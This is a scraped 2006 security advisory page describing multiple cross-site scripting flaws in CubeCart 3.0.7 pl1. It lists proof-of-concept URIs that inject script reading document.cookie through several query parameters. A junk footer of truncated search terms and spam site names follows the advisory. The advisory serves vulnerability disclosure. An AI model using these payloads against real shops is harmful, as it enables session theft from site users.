exploits , vulnerabilities , articles , CubeCart Multiple Cross-Site Scripting Vulnerabilities
| Title |
CubeCart Multiple Cross-Site Scripting Vulnerabilities |
| Published |
2006-01-16-12:00AM |
| Updated |
2006-01-16-12:00AM |
| Class |
Input Validation Error |
| CVE |
|
| Remote |
Yes |
| Local |
No |
| Credit |
lostmon is credited with the discovery of this vulnerability. |
| Vulnerable |
CubeCart CubeCart 3.0.7 pl1 |
| Not Vulnerable |
|
| Code |
No exploit is required.
The following proof of concept URI are available: http://www.example.com/cc3/cart.php?act=reg&redir=L3NpdGUvZGVtby9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcHQlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZXdDYXQmYW1wO1N1Ym1pdD1Hbw===%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E http://www.example.com/cc3/cart.php?act=reg&redir==%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E http://www.example.comcc3/index.php?searchStr=%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat&Submit=Go http://www.example.comcc3/index.php?act=login&redir=L3NpdGUvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb2NJZD0x=%3D%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E http://www.example.com/cc3/index.php?act=viewProd&productId=1"><script>alert(document.cookie)</script> http://www.example.com/cc3/index.php?act=viewDoc&docId=3"><script>alert(document.cookie)</script> http://www.example.com/cc3/index.php?act=viewProd"><script>alert(document.cookie)</script> http://www.example.com/cc3/index.php?act=viewCat&catId=1"><script>alert(document.cookie)</script> http://www.example.com/cc3/index.php?act=viewCat&catId=saleItems"><script>alert(document.cookie)</script> http://www.example.com/cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%E&act=viewCat http://www.example.com/cc3/index.php?act=viewDoc&docId=1"><script>alert(document.cookie)</script>
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Thu, 17 Dec 2009 08:49:56 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
IE7 exploi port sniff thinkroc.b www.diyihu exploit pd www.sexani sqlite saudi+girl 208702064 9191sese.c www.diyihu thinkroc.b ddos 0359mn.com dogsexpic www.sencip 200 /compo www.sencip www.sexy g www.sencip palo news for c www.sencip hotimaage TXT www.phonee russian se www.sencip Anjella powered by news for c maxcpm.inf openssh 4. cerita luc JILBAB NGE www.sencip gdmidea.ne mysql nt sdwr c home video www.gzsang www.0125.c indeasex.c www.sencip www.tattoo phplinks discuz+5 200 /compo mambo Remo www.meinvl
|